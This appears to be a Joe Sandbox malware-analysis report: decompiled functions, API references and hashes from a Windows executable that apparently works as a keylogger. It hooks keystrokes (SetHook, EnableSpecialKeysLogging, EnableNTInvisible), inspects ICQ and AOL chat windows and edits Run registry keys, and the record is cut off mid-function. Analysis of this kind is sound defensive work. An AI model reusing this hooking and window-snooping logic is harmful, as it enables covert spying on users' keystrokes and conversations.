Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #540$#860$H_prolog$#324#567Color
String ID:
API String ID: 4268370581-0
Opcode ID: b4f8629e4598d0e7ebb7e28fa231ee99bfb9faf3d400a4fe967322c0592e44b7
Instruction ID: b41c0ea52706e1c116a71570a7e5e4e629c207cf3181a50da6fbf2ac53039e64
Opcode Fuzzy Hash: b4f8629e4598d0e7ebb7e28fa231ee99bfb9faf3d400a4fe967322c0592e44b7
Instruction Fuzzy Hash: 05219230900784DADB15E7A6D441BDDFBB0AF65308F10885EA597632C2DBB82B08C765

Uniqueness

Uniqueness Score: -1.00%

Function 00427EA5, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 20%

			E00427EA5(void* __ecx) {
				void* __esi;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				long _t23;
				void* _t31;
				void* _t48;

				_t48 = __ecx;
				L0043DF94();
				_push(1);
				_push(0x808080);
				_push(0x10101);
				_push(0xefefef);
				_push(__ecx);
				_push(1);
				_t19 = L00404F47(_t18, __ecx + 0x12c, __ecx);
				_push(1);
				_push(0x808080);
				_push(0x10101);
				_push(0xefefef);
				_push(_t48);
				_push(2);
				_t20 = L00404F47(_t19, _t48 + 0xd8, _t48);
				_push(1);
				_push(0x808080);
				_push(0x10101);
				_push(0xefefef);
				_push(_t48);
				_push(0xe005);
				_t21 = L00404F47(_t20, _t48 + 0x180, _t48);
				_push(1);
				_push(0x808080);
				_push(0x10101);
				_push(0xefefef);
				_push(_t48);
				_push(0x3e8);
				L00404F47(_t21, _t48 + 0x1d4, _t48);
				_t23 = GetSysColor(0xf);
				_push("Verdana");
				 *(_t48 + 0xb0) = _t23;
				 *((intOrPtr*)(_t48 + 0xa8)) = 0x2bc;
				 *((intOrPtr*)(_t48 + 0xa4)) = 0xe;
				L0043DDD2();
				_push( *((intOrPtr*)(_t48 + 0xd0)));
				L0043E15C();
				_push((0 |  *( *((intOrPtr*)(_t48 + 0xd4)) + 0x14d) != 0x00000000) + 0x492);
				_push(0x493);
				_push(0x492);
				L0043E072();
				E004280C6( *( *((intOrPtr*)(_t48 + 0xd4)) + 0x14d) & 0x000000ff, _t48,  *( *((intOrPtr*)(_t48 + 0xd4)) + 0x14d) & 0x000000ff);
				_push( *((intOrPtr*)(_t48 + 0xd4)) + 0x150);
				_push(0x494);
				L0043E066();
				L0043E15C();
				_t31 = 1;
				return _t31;
			}

0x00427ea9
0x00427eab
0x00427eb5
0x00427ebc
0x00427ec2
0x00427ec3
0x00427ec4
0x00427ec5
0x00427ecd
0x00427ed2
0x00427ed4
0x00427ed5
0x00427ed6
0x00427ed7
0x00427ed8
0x00427ee0
0x00427ee5
0x00427ee7
0x00427ee8
0x00427ee9
0x00427eea
0x00427eeb
0x00427ef6
0x00427efb
0x00427efd
0x00427efe
0x00427eff
0x00427f00
0x00427f01
0x00427f0c
0x00427f13
0x00427f19
0x00427f24
0x00427f2a
0x00427f34
0x00427f3e
0x00427f43
0x00427f4c
0x00427f69
0x00427f6a
0x00427f6f
0x00427f72
0x00427f87
0x00427f99
0x00427f9a
0x00427f9f
0x00427fa6
0x00427fad
0x00427fb2

APIs

#4710.MFC42 ref: 00427EAB
GetSysColor.USER32(0000000F), ref: 00427F13
#860.MFC42 ref: 00427F3E
#6199.MFC42(?), ref: 00427F4C
#1783.MFC42(00000492,00000493,00000000,?), ref: 00427F72

Part of subcall function 004280C6: #3092.MFC42(00000494,?,?,00427F8C,?,00000492,00000493,00000000,?), ref: 004280D2
Part of subcall function 004280C6: #2642.MFC42(00000494,?,?,00427F8C,?,00000492,00000493,00000000,?), ref: 004280D9
Part of subcall function 004280C6: #3092.MFC42(000003E8,?,00000494,?,?,00427F8C,?,00000492,00000493,00000000,?), ref: 004280E9
Part of subcall function 004280C6: #2642.MFC42(000003E8,?,00000494,?,?,00427F8C,?,00000492,00000493,00000000,?), ref: 004280F0

#3092.MFC42(00000494,?,?,00000492,00000493,00000000,?), ref: 00427F9F
#6199.MFC42(00000494,?,?,00000492,00000493,00000000,?), ref: 00427FA6

Strings

Verdana, xrefs: 00427F19

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #3092$#2642#6199$#1783#4710#860Color
String ID: Verdana
API String ID: 1486464219-987297809
Opcode ID: 2c9a6b9d475d403de3149958310782fb5da72e87d5f7b8baa2737736c69b166f
Instruction ID: 3070653a1b647c8fa2bbaf92acb5b6fa64600ae0ce74d28e4e55b190f3e01522
Opcode Fuzzy Hash: 2c9a6b9d475d403de3149958310782fb5da72e87d5f7b8baa2737736c69b166f
Instruction Fuzzy Hash: 4421B6703017047BE624A772CC96FEB7A9CDF85744F00042EB29AA62C2DEB52944C764

Uniqueness

Uniqueness Score: -1.00%

Function 00420C62, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 66
windowCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E00420C62(intOrPtr __ecx, void* __eflags) {
				intOrPtr* _t32;
				long _t33;
				void* _t34;
				void* _t35;
				void* _t36;
				void* _t38;
				intOrPtr* _t55;
				intOrPtr _t58;
				void* _t60;

				E0043E4E0(0x44207c, _t60);
				_push(__ecx);
				_push(__ecx);
				_t58 = __ecx;
				 *((intOrPtr*)(_t60 - 0x10)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x4493d8;
				 *(_t60 - 4) = 8;
				E00421274(__ecx, __eflags, 0);
				E00428B4A();
				_t32 =  *((intOrPtr*)(__ecx + 0x2758));
				_t64 = _t32;
				if(_t32 != 0) {
					 *_t32(0);
				}
				_t33 = SendMessageA(0xffff, 0, 0, 0);
				 *((intOrPtr*)(_t60 - 0x14)) = _t58 + 0x276c;
				 *(_t60 - 4) = 9;
				L0043DD36();
				 *(_t60 - 4) = 7;
				L0043DD36();
				 *(_t60 - 4) = 6;
				L0043DD36();
				 *(_t60 - 4) = 5;
				_t34 = E004284F0(_t33, _t58 + 0x1204);
				 *(_t60 - 4) = 4;
				_t35 = E004284F0(_t34, _t58 + 0xd50);
				 *(_t60 - 4) = 3;
				_t36 = E004284F0(_t35, _t58 + 0x89c);
				 *(_t60 - 4) = 2;
				E004284F0(_t36, _t58 + 0x3e8);
				 *(_t60 - 4) = 1;
				_t38 = E0042003A(_t58 + 0x78, _t64);
				_t55 = _t58 + 0x6c;
				 *((intOrPtr*)(_t60 - 0x14)) = _t55;
				 *_t55 = 0x445440;
				 *(_t60 - 4) = 0xa;
				L0043DD72();
				 *(_t60 - 4) =  *(_t60 - 4) | 0xffffffff;
				 *_t55 = 0x44547c;
				L0043E04E();
				 *[fs:0x0] =  *((intOrPtr*)(_t60 - 0xc));
				return _t38;
			}

0x00420c67
0x00420c6c
0x00420c6d
0x00420c6f
0x00420c72
0x00420c75
0x00420c7d
0x00420c85
0x00420c8a
0x00420c8f
0x00420c95
0x00420c97
0x00420c9a
0x00420c9a
0x00420ca4
0x00420cb0
0x00420cb9
0x00420cbd
0x00420cc8
0x00420ccc
0x00420cd7
0x00420cdb
0x00420ce6
0x00420cea
0x00420cf5
0x00420cf9
0x00420d04
0x00420d08
0x00420d13
0x00420d17
0x00420d1f
0x00420d23
0x00420d28
0x00420d2b
0x00420d2e
0x00420d36
0x00420d3a
0x00420d3f
0x00420d45
0x00420d4b
0x00420d55
0x00420d5d

APIs

__EH_prolog.LIBCMT ref: 00420C67

Part of subcall function 00421274: __EH_prolog.LIBCMT ref: 00421279
Part of subcall function 00421274: LoadLibraryA.KERNEL32(?,00000000,?,00000000), ref: 004212B9
Part of subcall function 00421274: GetProcAddress.KERNEL32(00000000,SetHook), ref: 004212D8
Part of subcall function 00421274: GetProcAddress.KERNEL32(EnableSpecialKeysLogging), ref: 004212F3
Part of subcall function 00421274: GetProcAddress.KERNEL32(DLL_GetProjectVersion), ref: 0042130E
Part of subcall function 00421274: GetProcAddress.KERNEL32(EnablePreHandle), ref: 00421329
Part of subcall function 00421274: GetProcAddress.KERNEL32(EnableNTInvisible), ref: 00421344
Part of subcall function 00421274: GetProcAddress.KERNEL32(EnableDiaryTracking), ref: 0042135F
Part of subcall function 00421274: GetProcAddress.KERNEL32(EnableAltInterception), ref: 00421376
Part of subcall function 00421274: #1200.MFC42(?,00000010,00000000,?,00000000), ref: 004213A8
Part of subcall function 00421274: #800.MFC42(?,00000010,00000000,?,00000000), ref: 004213B4

Part of subcall function 00428B4A: FreeLibrary.KERNEL32(75370000,00420C8F,00000000,?,00000000,?,?,0041FEF1), ref: 00428B54

SendMessageA.USER32(0000FFFF,00000000,00000000,00000000), ref: 00420CA4
#800.MFC42(?,00000000,?,?,0041FEF1), ref: 00420CBD
#800.MFC42(?,00000000,?,?,0041FEF1), ref: 00420CCC
#800.MFC42(?,00000000,?,?,0041FEF1), ref: 00420CDB
#2414.MFC42(?,00000000,?,?,0041FEF1), ref: 00420D3A
#641.MFC42(?,00000000,?,?,0041FEF1), ref: 00420D4B

Strings

| D, xrefs: 00420C62

Memory Dump Source

Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: AddressProc$#800$H_prologLibrary$#1200#2414#641FreeLoadMessageSend
String ID: | D
API String ID: 3770306581-1184885005
Opcode ID: be6548f9cddb7e409cbf84289a39a8f7b659c8c7b0a1bf8dc634c04f12132317
Instruction ID: 58e8910697103f814cb901bc3ee9ec1830d65644f69f7da7795e59f90f6fb002
Opcode Fuzzy Hash: be6548f9cddb7e409cbf84289a39a8f7b659c8c7b0a1bf8dc634c04f12132317
Instruction Fuzzy Hash: C121CC30901681DAD715EBA6D5057EEFBF4AFA6308F50464EA49963282DBB83B04C626

Uniqueness

Uniqueness Score: -1.00%

Function 00428249, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00428249() {
				void* _v8;
				char _v72;

				E0042A6AA( &_v72, 0, 0);
				 *(strrchr( &_v72, 0x2e)) = 0;
				RegOpenKeyA(0x80000001, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",  &_v8);
				RegDeleteValueA(_v8,  &_v72);
				RegCloseKey(_v8);
				RegOpenKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",  &_v8);
				RegDeleteValueA(_v8,  &_v72);
				return RegCloseKey(_v8);
			}

0x0042825a
0x00428274
0x00428284
0x00428293
0x0042829e
0x004282ae
0x004282b7
0x004282c2

APIs

Part of subcall function 0042A6AA: GetModuleFileNameA.KERNEL32(00000000,?,00000103), ref: 0042A6C3
Part of subcall function 0042A6AA: lstrlenA.KERNEL32(?), ref: 0042A6D6
Part of subcall function 0042A6AA: lstrlenA.KERNEL32 ref: 0042A6E4
Part of subcall function 0042A6AA: lstrcatA.KERNEL32(00000000), ref: 0042A701
Part of subcall function 0042A6AA: strrchr.MSVCRT ref: 0042A710
Part of subcall function 0042A6AA: lstrcpyA.KERNEL32(?,00000001), ref: 0042A71D

strrchr.MSVCRT ref: 00428265
RegOpenKeyA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,?), ref: 00428284
RegDeleteValueA.ADVAPI32(?,?), ref: 00428293
RegCloseKey.ADVAPI32(?), ref: 0042829E
RegOpenKeyA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,?), ref: 004282AE
RegDeleteValueA.ADVAPI32(?,?), ref: 004282B7
RegCloseKey.ADVAPI32(?), ref: 004282BC

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 0042827A, 004282A4

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: CloseDeleteOpenValuelstrlenstrrchr$FileModuleNamelstrcatlstrcpy
String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
API String ID: 4064599168-3913687870
Opcode ID: 912e6d8e2a2d6d185f7b45b3ca63b2f121fa44e9e1f5146e2cffeb0bf956013f
Instruction ID: 7b2be888fc126ab24d092b6f081b655f08524486b36ed0db7a19b91b7c9bcbd2
Opcode Fuzzy Hash: 912e6d8e2a2d6d185f7b45b3ca63b2f121fa44e9e1f5146e2cffeb0bf956013f
Instruction Fuzzy Hash: B4014F7690014CFFDB01EBE4DD85E9E7B7CEB85308B200062EA00A2112D671AF19DB64

Uniqueness

Uniqueness Score: -1.00%

Function 004092E1, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 46
stringCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E004092E1(struct HWND__* _a4, char* _a8) {
				struct HWND__* _t9;
				signed int _t10;
				CHAR* _t14;

				if(_a4 != 0) {
					if(strncmp(_a8, "#32770", 6) != 0 || FindWindowExA(_a4, 0, "Button", "ICQ") == 0) {
						goto L1;
					} else {
						_t14 = "RichEdit20A";
						_t9 = FindWindowExA(_a4, 0, _t14, 0);
						if(_t9 == 0) {
							goto L1;
						}
						_t10 = FindWindowExA(_a4, _t9, _t14, 0);
						asm("sbb al, al");
						return  ~_t10 + 1;
					}
				}
				L1:
				return 0;
			}

0x004092ec
0x00409307
0x00000000
0x00409323
0x00409323
0x0040932e
0x00409332
0x00000000
0x00000000
0x0040933a
0x0040933e
0x00000000
0x00409340
0x00409307
0x004092ee
0x00000000

APIs

strncmp.MSVCRT(?,#32770,00000006), ref: 004092FC
FindWindowExA.USER32 ref: 0040931D
FindWindowExA.USER32 ref: 0040932E
FindWindowExA.USER32 ref: 0040933A

Strings

#32770, xrefs: 004092F4
RichEdit20A, xrefs: 00409323, 00409329, 00409335
ICQ, xrefs: 0040930F
Button, xrefs: 00409314

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: FindWindow$strncmp
String ID: #32770$Button$ICQ$RichEdit20A
API String ID: 3975895692-2832032975
Opcode ID: c6edd5a0281d798725ba843f79a0b680ba443edcacbd3a636c9b5c8a64934033
Instruction ID: 33208eb164e93638c8747c7c9d45e8ec07bacc87aef12c137d348bfd7427462e
Opcode Fuzzy Hash: c6edd5a0281d798725ba843f79a0b680ba443edcacbd3a636c9b5c8a64934033
Instruction Fuzzy Hash: 68F0F63164021D7BDB115E61DC81E677F1DDB427DAB11803BFC04A5196C2358D5596B8

Uniqueness

Uniqueness Score: -1.00%

Function 00409417, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 45
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409417(struct HWND__* _a4, char* _a8) {
				struct HWND__* _t11;
				CHAR* _t15;

				if(_a4 != 0) {
					if(strncmp(_a8, "#32770", 6) != 0 || FindWindowExA(_a4, 0, "Button", "ICQ") == 0) {
						goto L1;
					} else {
						_t15 = "AfxOleControl42";
						_t11 = FindWindowExA(_a4, 0, _t15, 0);
						if(_t11 == 0) {
							goto L1;
						}
						return FindWindowExA(_a4, _t11, _t15, 0) & 0xffffff00 | _t12 != 0x00000000;
					}
				}
				L1:
				return 0;
			}

0x00409422
0x0040943d
0x00000000
0x00409459
0x00409459
0x00409464
0x00409468
0x00000000
0x00000000
0x00000000
0x00409474
0x0040943d
0x00409424
0x00000000

APIs

strncmp.MSVCRT(?,#32770,00000006), ref: 00409432
FindWindowExA.USER32 ref: 00409453
FindWindowExA.USER32 ref: 00409464
FindWindowExA.USER32 ref: 00409470

Strings

#32770, xrefs: 0040942A
ICQ, xrefs: 00409445
AfxOleControl42, xrefs: 00409459, 0040945F, 0040946B
Button, xrefs: 0040944A

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: FindWindow$strncmp
String ID: #32770$AfxOleControl42$Button$ICQ
API String ID: 3975895692-3418877755
Opcode ID: 93524dc3c454a6c06e28bb8c388d0b640a9b8e77a7c9c7097eed8afc565a44eb
Instruction ID: 1dfaac3a0c45c9d43273807a4795fa31b4824e83bf51e2803ee334bb54ceb4bf
Opcode Fuzzy Hash: 93524dc3c454a6c06e28bb8c388d0b640a9b8e77a7c9c7097eed8afc565a44eb
Instruction Fuzzy Hash: 43F0F63160421C7BDF115E61DC41E6B7E5DEB427EAB10C033FC04A5163C235CD5696B8

Uniqueness

Uniqueness Score: -1.00%

Function 0040F27A, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 43
stringCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E0040F27A(long __ecx, void* __eflags) {
				char _v24;
				void* __edi;
				void* __ebp;
				int _t8;
				struct HWND__* _t9;
				void* _t15;
				long _t16;
				struct HWND__* _t17;

				_t16 = __ecx;
				E0040F4AE(__ecx);
				_t17 = GetForegroundWindow();
				GetClassNameA(_t17,  &_v24, 0x14);
				_t8 = strcmp( &_v24, "AOL Frame25");
				_push(0);
				if(_t8 != 0) {
					_push(_t17);
					_t9 = E0040F2EA(_t16, _t15, _t16);
				} else {
					_t9 = FindWindowExA(_t17, 0, "MDIClient", ??);
					if(_t9 != 0) {
						_t9 = EnumChildWindows(_t9, E0040A558, _t16);
					}
				}
				L0043E192();
				return _t9;
			}

0x0040f282
0x0040f284
0x0040f28f
0x0040f298
0x0040f2a7
0x0040f2b0
0x0040f2b2
0x0040f2d5
0x0040f2d8
0x0040f2b4
0x0040f2bc
0x0040f2c4
0x0040f2cd
0x0040f2cd
0x0040f2c4
0x0040f2df
0x0040f2e7

APIs

Part of subcall function 0040F4AE: __EH_prolog.LIBCMT ref: 0040F4B3
Part of subcall function 0040F4AE: IsWindow.USER32(?), ref: 0040F4E7
Part of subcall function 0040F4AE: #535.MFC42(?), ref: 0040F562

GetForegroundWindow.USER32 ref: 0040F289
GetClassNameA.USER32(00000000,?,00000014), ref: 0040F298
strcmp.MSVCRT ref: 0040F2A7
FindWindowExA.USER32 ref: 0040F2BC
EnumChildWindows.USER32 ref: 0040F2CD
#2379.MFC42(00000000,00000000), ref: 0040F2DF

Strings

AOL Frame25, xrefs: 0040F2A1
MDIClient, xrefs: 0040F2B4

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: Window$#2379#535ChildClassEnumFindForegroundH_prologNameWindowsstrcmp
String ID: AOL Frame25$MDIClient
API String ID: 1572395021-662669148
Opcode ID: a243f2a0a7d2e1f3ddefa5d546183dc2f23e5a37e51c77b7f752b9b94ca9d3b2
Instruction ID: 5847035ba2ef253654096b39f12c3da6d0f446c485fda01d8a68aa349e3583cf
Opcode Fuzzy Hash: a243f2a0a7d2e1f3ddefa5d546183dc2f23e5a37e51c77b7f752b9b94ca9d3b2
Instruction Fuzzy Hash: A6F0C27920120476D62077765C0AF6F365C8B86715F60003BF501B18C2EA7C990991BD

Uniqueness

Uniqueness Score: -1.00%

Function 0040A4BB, Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 42
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E0040A4BB() {
				signed int _t14;
				void* _t17;
